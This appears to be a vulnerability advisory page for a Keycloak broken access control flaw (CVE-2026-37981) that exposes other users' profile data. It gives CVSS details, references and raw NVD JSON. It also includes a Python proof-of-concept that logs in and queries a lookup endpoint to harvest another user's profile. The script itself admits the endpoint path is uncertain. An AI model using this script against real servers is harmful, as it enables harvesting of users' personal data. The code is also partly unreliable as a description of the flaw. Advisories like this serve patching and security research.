Security Vulnerability Report
CVE-2026-37981 CVSS 4.3 MEDIUM

CVE-2026-37981

Published: 2026-05-19 12:16:18
Last Modified: 2026-05-20 17:16:22

Description

A flaw was found in Keycloak. A broken access control vulnerability in the Account Resources user lookup endpoint allows a remote authenticated user, who owns at least one User-Managed Access (UMA) resource, to enumerate and harvest personally identifiable information (PII) for all realm users. By sending crafted requests with arbitrary usernames or email values, the endpoint returns full profile objects for unrelated users. This leads to broad profile-level information disclosure.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Keycloak (for the specific affected versions, see RHSA-2026:19596 and RHSA-2026:19597)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# Proof of Concept for CVE-2026-37981
# Author: Security Analyst
import json
import sys

import requests

# Configuration
REALM_URL = "https://keycloak.example.com/realms/master"
TARGET_URL = f"{REALM_URL}/account"  # Account REST API base
USERNAME = "attacker"
PASSWORD = "password"
TARGET_USER_TO_ENUM = "admin"

# Create a session to handle cookies
session = requests.Session()

# 1. Authenticate to obtain a token
# The OIDC token endpoint is at the realm level, not under /account
login_payload = {
    "username": USERNAME,
    "password": PASSWORD,
    "client_id": "account-console",
    "grant_type": "password",
}
print("[+] Logging in...")
auth_resp = session.post(f"{REALM_URL}/protocol/openid-connect/token", data=login_payload)
if auth_resp.status_code != 200:
    print("[-] Login failed")
    sys.exit(1)

access_token = auth_resp.json().get("access_token")
headers = {
    "Authorization": f"Bearer {access_token}",
    "Content-Type": "application/json",
}

# 2. Exploit: Lookup arbitrary user via the vulnerable endpoint
# The endpoint allows querying any username if the attacker has a UMA resource
print(f"[+] Attempting to enumerate user: {TARGET_USER_TO_ENUM}")
# Note: The exact endpoint path might vary based on Keycloak version;
# this represents the vulnerable resource lookup
enum_url = f"{TARGET_URL}/resources/users/lookup"
payload = {"username": TARGET_USER_TO_ENUM}

response = session.post(enum_url, headers=headers, data=json.dumps(payload))
if response.status_code == 200:
    user_data = response.json()
    print("[+] Success! User profile data leaked:")
    print(json.dumps(user_data, indent=2))
else:
    print("[-] Exploit failed or endpoint not vulnerable.")
```

References

https://access.redhat.com/errata/RHSA-2026:19596
https://access.redhat.com/errata/RHSA-2026:19597
https://access.redhat.com/security/cve/CVE-2026-37981
https://bugzilla.redhat.com/show_bug.cgi?id=2455326

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-37981",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-19T12:16:18.463",
    "lastModified": "2026-05-20T17:16:21.960",
    "vulnStatus": "Undergoing Analysis",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A flaw was found in Keycloak. A broken access control vulnerability in the Account Resources user lookup endpoint allows a remote authenticated user, who owns at least one User-Managed Access (UMA) resource, to enumerate and harvest personally identifiable information (PII) for all realm users. By sending crafted requests with arbitrary usernames or email values, the endpoint returns full profile objects for unrelated users. This leads to broad profile-level information disclosure."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-1220"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://access.redhat.com/errata/RHSA-2026:19596",
        "source": "[email protected]"
      },
      {
        "url": "https://access.redhat.com/errata/RHSA-2026:19597",
        "source": "[email protected]"
      },
      {
        "url": "https://access.redhat.com/security/cve/CVE-2026-37981",
        "source": "[email protected]"
      },
      {
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2455326",
        "source": "[email protected]"
      }
    ]
  }
}
```